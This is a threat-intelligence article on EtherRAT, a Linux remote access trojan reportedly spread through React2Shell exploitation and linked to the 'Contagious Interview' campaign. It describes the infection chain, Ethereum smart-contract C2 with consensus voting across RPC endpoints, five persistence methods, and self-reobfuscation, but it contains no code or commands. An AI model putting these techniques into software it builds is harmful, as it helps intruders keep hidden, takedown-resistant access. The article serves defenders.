EtherRAT Malware

A recently uncovered threat campaign linked to North Korean operators is believed to be exploiting the critical React2Shell (RSC) vulnerability to deploy a previously unseen remote access trojan known as EtherRAT. This malware stands out for incorporating Ethereum smart contracts into its Command‑and‑Control (C2) workflow, installing multiple persistence layers on Linux, and bundling its own Node.js runtime during deployment.

Links to the Ongoing 'Contagious Interview' Operations

Security teams have identified strong similarities between EtherRAT activity and the long‑running campaign referred to as Contagious Interview, a series of attacks that has been active since early 2025 and uses the EtherHiding technique for malware delivery.

These operations typically target blockchain and Web3 developers by masking malicious intentions behind fabricated job interviews, coding tests, and video assessments. Victims are usually contacted through platforms such as LinkedIn, Upwork, and Fiverr, where attackers impersonate legitimate recruiters offering high‑value employment opportunities.

Researchers note that this threat cluster has become one of the most productive malicious forces within the npm ecosystem, demonstrating its skill at infiltrating JavaScript‑based supply chains and crypto‑focused workflows.

The Initial Breach: React2Shell Exploitation

The attack sequence begins with the exploitation of CVE‑2025‑55182, a critical RSC vulnerability with a perfect severity score of 10. Using this flaw, attackers execute a Base64‑encoded command that downloads and triggers a shell script responsible for initiating the primary JavaScript implant.

The script is fetched via curl, with wget and python3 acting as backup methods. Before launching the main payload, it prepares the system by acquiring Node.js v20.10.0 directly from nodejs.org, then writes both an encrypted data blob and an obscured JavaScript dropper to disk. To limit forensic traces, the script cleans up after itself once the setup is complete and hands control over to the dropper.

Delivery of EtherRAT: Encryption, Execution, and Smart Contract C2

The dropper's core function is straightforward: decrypt the EtherRAT payload using a hard‑coded key and launch it with the freshly downloaded Node.js binary.

EtherRAT's standout feature is its reliance on EtherHiding, a method that retrieves the C2 server address from an Ethereum smart contract every five minutes. This allows the operators to update infrastructure on the fly, even if defenders disrupt existing domains.

A unique twist in this implementation is its consensus‑based voting system. EtherRAT queries nine public Ethereum RPC endpoints simultaneously, collects the results, and trusts the C2 URL returned by the majority. This approach neutralizes several defensive strategies, ensuring that one compromised or manipulated RPC endpoint cannot mislead or sinkhole the botnet.

Researchers previously spotted a similar technique in malicious npm packages colortoolsv2 and mimelib2, which were used to distribute downloader components to developers.

High‑Frequency Command Polling and Multi‑Layer Persistence

After establishing communication with its C2 server, EtherRAT enters a rapid polling cycle running every 500 milliseconds. Any response exceeding ten characters is interpreted as JavaScript and executed instantly on the compromised system.

Long‑term access is maintained through five persistence techniques, pushing reliability across various Linux startup processes:

Persistence Methods:

• Systemd user service
• XDG autostart entry
• Cron jobs
• .bashrc modification
• Profile injection

By spreading across multiple execution paths, the malware continues running even after reboots, ensuring uninterrupted access for the operators.

Self‑Updating Capabilities and Obfuscation Strategy

EtherRAT includes a sophisticated update process: it sends its own source code to an API endpoint, receives a modified version from the C2 server, and relaunches itself with this new variant. Although the update is functionally identical, the returned payload is obfuscated differently, helping the implant evade static detection techniques.

Code Overlaps With Previous JavaScript Threat Families

Further analysis reveals that parts of EtherRAT's encrypted loader share patterns with BeaverTail, a known JavaScript‑based downloader and information stealer used in Contagious Interview operations. This reinforces the assessment that EtherRAT is either a direct successor or an extension of tooling used in that campaign.

Implications for Defenders: A Shift Toward Stealth and Persistence

EtherRAT demonstrates a significant evolution in the exploitation of React2Shell. Instead of focusing solely on opportunistic activities like cryptomining or credential theft, this implant prioritizes stealthy, long‑term access. Its blend of smart‑contract‑driven C2 operations, consensus‑based endpoint verification, multiple persistence layers, and continuous self‑obfuscation poses a serious challenge for defenders.

Key Takeaways for Security Teams

Security teams should note that EtherRAT represents a significant escalation in RSC exploitation, transforming it into a persistent and highly adaptable threat capable of sustaining long-term intrusions. Its command-and-control infrastructure is particularly resilient, leveraging Ethereum smart contracts and a multi-endpoint consensus mechanism to withstand sinkholing attempts, takedowns, and manipulation of individual endpoints. Additionally, the malware's close association with the Contagious Interview campaign highlights an ongoing focus on high-value developer targets, emphasizing the need for heightened vigilance within the blockchain and Web3 development communities.